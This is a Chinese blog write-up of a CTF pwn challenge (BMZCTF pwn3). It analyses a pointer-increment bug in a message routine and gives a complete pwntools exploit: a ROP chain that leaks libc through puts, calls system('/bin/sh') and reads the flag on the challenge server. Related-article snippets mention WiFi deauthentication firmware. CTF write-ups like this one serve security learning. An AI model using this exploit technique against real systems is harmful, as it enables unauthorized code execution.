[BMZCTF-pwn] 25-pwn3

最新推荐文章于 2024-03-30 15:58:25 发布
最新推荐文章于 2024-03-30 15:58:25 发布
阅读量130 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122956020
版权

第三题的难度就突然上来了。程序先是个菜单,有好向项都没用;smsg先调用clear_string然后问是否发送,输入Y就退出循环

int smsg()
{
  char v1; // [rsp+7h] [rbp-59h] BYREF
  void *buf; // [rsp+8h] [rbp-58h] BYREF
  char v3; // [rsp+10h] [rbp-50h] BYREF
  int v4; // [rsp+5Ch] [rbp-4h]

  v4 = 0;
  v1 = 78;
  buf = &v3;
  while ( v1 != 89 )
  {
    clear_string(&buf, v4);
    printf("|\n`->");
    v4 = read(0, buf, 0x40uLL);
    do
    {
      printf("Send?(Y/N)");
      __isoc99_scanf(" %c", &v1);
    }
    while ( v1 != 89 && v1 != 78 );
  }
  return puts("Sent.");
}

clear_string听上去像是清0,但是一般清0都用memset所以这里肯定有问题。看前边v4=0然后就一直没动过,所以传入的参数a2始终是0,这个for循环会运行1次。

*(*a1)++这个会先执行*a1++再执行*,也就是每次运行这个buf指针会加1。

_QWORD *__fastcall clear_string(_QWORD *a1, int a2)
{
  _QWORD *result; // rax
  int i; // [rsp+18h] [rbp-4h]

  for ( i = 0; i <= a2; ++i )
    *(_BYTE *)(*a1)++ = 0;   // a2=0,执行一次 *buf++;再作 *buf=0 会导致buf指针下移1字节
  result = a1;
  *a1 -= a2;
  return result;
}

这个问题解决了就好办了,每次写之前先执行smsg(N)0x57次将buf指针加1....直到可以溢出位置再向里写放payload

原来buf是指向v3的,这个v3向下0x50是rbp再向下就是函数返回地址了。

完整exp

from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
else:
    p = remote('www.bmzclub.cn', 21355) 

libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
libc_start_main_ret = 0x20830

elf = ELF('./pwn')
context(arch = 'amd64', log_level = 'debug') #

def smsg(send=b'N', data=b'A'):
    p.sendlineafter(b'->', data)
    p.sendlineafter(b'Send?(Y/N)', send)

def send(msg):
    p.sendlineafter(b'>', b'smsg')
    for i in range(0x57):
        smsg()  #(*buf)++
    smsg(b'Y', msg)

pop_rdi = 0x000000000040155b # pop rdi ; ret
main    = 0x4013fa
payload = flat(pop_rdi, elf.got['puts'], elf.plt['puts'], main)
send(payload)
p.recvline()
libc_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) - libc_elf.sym['puts']
libc_elf.address = libc_base
print('libc:', hex(libc_base))

payload = flat(pop_rdi, next(libc_elf.search(b'/bin/sh')), libc_elf.sym['system'])
send(payload)

p.sendline(b'cat /flag')
p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
获得清单文件的内置属性
心想事成
11-16 357
获得清单文件的内置属性         /************************************************************************/ /* 获得清单文件的内置属性 第一个参数为文件名 第二个参数为属性序号,从 1 开始,到 32,已知的有下面的一些常用值: 1   assemblyIdentity name 2  
string [XCTF-PWN]CTF writeup系列7(超详细分析)
重新启程
12-20 3975
题目地址:string 先看看题目情况 照例检查一下保护机制 root@mypwn:/ctf/work/python# checksec 167e00a26ef44e1f888b3ede29d88e38 [*] '/ctf/work/python/167e00a26ef44e1f888b3ede29d88e38' Arch: amd64-64-little RE...
学习笔记lalala
weixin_56780239的博客
02-23 275
orw:发现写shellcode的新大陆 from pwn import * p = remote('chall.pwnable.tw',10001) #p = process('./orw') context.log_level = 'debug' context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c'] if args.G: gdb.attach(p) shellcode = "" shellcode += shellcraft.i3
BUUCTF之“oneshot_tjctf_2016”
Probeginner的博客
12-21 578
当做onegadget的复习
IDA Pro *(_QWORD *)和*(_BYTE *)表达式解释
最新发布
Jingged的博客
03-30 1030
这种类型转换和解引用的组合在反汇编和逆向工程中非常常见,因为原始源代码中的数据类型和变量名在编译过程中通常会丢失,而分析人员需要依赖工具来理解和解释机器代码。作为一个整体,通常用于将一个地址(或其他整数)转换为一个指向64位无符号整数的指针,并获取该地址上的值。时,这通常意味着某个地址或值被转换为一个指向字节的指针,并且随后会解引用该指针以获取该地址上的字节值。允许你在不知道原始数据类型的情况下,以特定的方式(这里是64位无符号整数)解释和访问内存中的数据。类似,但这里涉及的是1字节(8位)的数据。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
CTF必备技能丨Linux Pwn入门教程——ROP技术(上)
dfdhxb995397的博客
07-16 1009
Linux Pwn入门教程系列分享如约而至,本套课程是作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的题目和文章整理出一份相对完整的Linux Pwn教程。 教程仅针对i386/amd64下的Linux Pwn常见的Pwn手法,如栈,堆,整数溢出,格式化字符串,条件竞争等进行介绍,所有环境都会封装在Docker镜像当中,并提供调试用的教学程序,...
confused_flxg
weixin_43906500的博客
01-08 451
目录 实验步骤 1.测试程序功能 2.使用IDA进行分析 3.查找flag位置 4.使用python解密 实验步骤 本题为Hackergame 2018的一道题目 1.测试程序功能 解压压缩包,执行程序,如下: 按照输入要求输入程序,得到以下结果 使用python解码可知,此flag为错误的 使用peinfo查看文件相关信息 可知文件并未加壳 2.使用IDA进行分析 使用Shift+F12打开字符串表 经过大量经验可知重点关注\n,...
2019全国信息安全大赛4.double 堆利用
Jc
08-12 475
解题思路 1. 查看文件信息,安全机制 2. 代码审计 3. 分析漏洞点 4. 编写EXP 基本信息 安全机制 运行 标题
CTF-RE-cello_rule (lib库函数的分析)
SuperGate的博客
09-10 559
题目概述 题目给出了一个linux下的可执行程序和一个加密过的flag.png。可以知道程序是对这个文件进行加密,然后输出加密后的文件。因此我们的思路就是逆向程序的加密方式和逻辑,从而逆推出flag.enc的源文件。 具体分析 由于我们不清楚程序真正逻辑的入口点,因此第一步是ida查看程序的可以字符串。 这些字符串显然是值得我们去研究的,在google上面可以查到这些字符串的信息。发现这些字符串...
计算器中,Byte,Word, Dword, Qword
热门推荐
魏戴夫的博客
04-27 2万+
1、MC:清除存储器中的数值。 2、MR:将存于存储器中的数显示在计算器的显示框上。 3、MS:将显示框的数值存于存储器中。如果存储器中有数值将会显示M标志。 4、M+:将显示框的数与存储器中的数相加并进行存储。 位 Bit: 是计算机内部数据储存的最小单位 字节 Byte: 八个比特 (Bit) 称为一个字节,是计算机中数据处理的基本单位 字 Word: 两个字节称为一个字, 即16位 双字 Dword: 两个字称为一个双字,两个Word,为32位 D为double 四字 Qword: 两个双字.
数据宽度-Bit、Byte、Word、Dword、Qword
hmyqwe的博客
11-19 4644
位 Bit: 是计算机内部数据储存的最小单位 字节 Byte: 八个比特 (Bit) 称为一个字节,是计算机中数据处理的基本单位 字 Word: 两个字节称为一个字 双字 Dword: 两个字称为一个双字 四字 Qword: 两个双字称为一个四字 ...
(_DWORD )是什么?
SkYe's Blog
08-15 1万+
*(_DWORD *)是什么? 用IDA分析文件时,出现的反汇编代码,如下图: *(_DWORD *)是强制类型转化,然后在提领指针。 dword是指注册表的键值,每个word为2个字节,dword双字即为4个字节。 结合以上信息可以推出第8行代码*(_DWORD *)(4LL * i + a1)的理解应为: ​ 从 a1[4LL * i] 开始,按DWORD格式取出 四个字节。(其...
mqtt-pwn安装
09-20
3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值